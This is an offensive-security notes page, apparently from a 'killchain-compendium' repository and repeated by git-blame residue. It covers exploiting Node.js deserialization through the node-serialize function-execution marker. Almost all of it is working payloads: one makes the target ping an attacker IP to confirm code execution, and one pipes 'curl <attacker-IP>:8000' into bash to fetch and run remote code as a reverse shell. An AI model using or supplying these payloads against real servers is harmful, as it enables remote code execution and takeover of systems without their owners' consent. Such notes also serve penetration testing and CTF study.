killchain-compendium/Exploits/Web/Node.js Deserialization.md

# De/Serialization

* `_$$ND_FUNC$$_function (){}` is executed after parsing

## Example Payloads

* Encode, send and wait with `sudo tcpdump -i <interface> icmp`

```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```

Reverse shell via 

```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# De/Serialization`

			* `_$$ND_FUNC$$_function (){}` is executed after parsing

			`## Example Payloads`

			* Encode, send and wait with `sudo tcpdump -i <interface> icmp`
details on pickle and php serialize 2024-05-07 21:38:46 +02:00
restructured Exploits 2022-11-13 22:38:01 +01:00			```js
			`{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}`
			```
details on pickle and php serialize 2024-05-07 21:38:46 +02:00
			`Reverse shell via`

restructured Exploits 2022-11-13 22:38:01 +01:00			```js
			`{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 \| bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}`
			```